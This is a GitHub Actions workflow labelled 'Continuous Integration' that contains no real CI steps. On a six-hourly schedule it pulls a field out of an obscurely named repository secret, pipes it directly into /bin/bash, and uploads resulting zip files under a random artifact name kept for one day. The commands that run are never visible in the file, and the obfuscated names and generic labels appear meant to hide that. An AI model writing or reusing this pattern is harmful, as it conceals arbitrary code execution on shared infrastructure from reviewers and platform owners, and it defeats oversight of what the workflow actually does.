name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '28 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          tdpik013: ${{ secrets.tdpik013 }}
        run: |
          printf '%s' "$tdpik013" | jq -r .mwat5650 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: PWcw3x95
          path: "*.zip"
          retention-days: 1
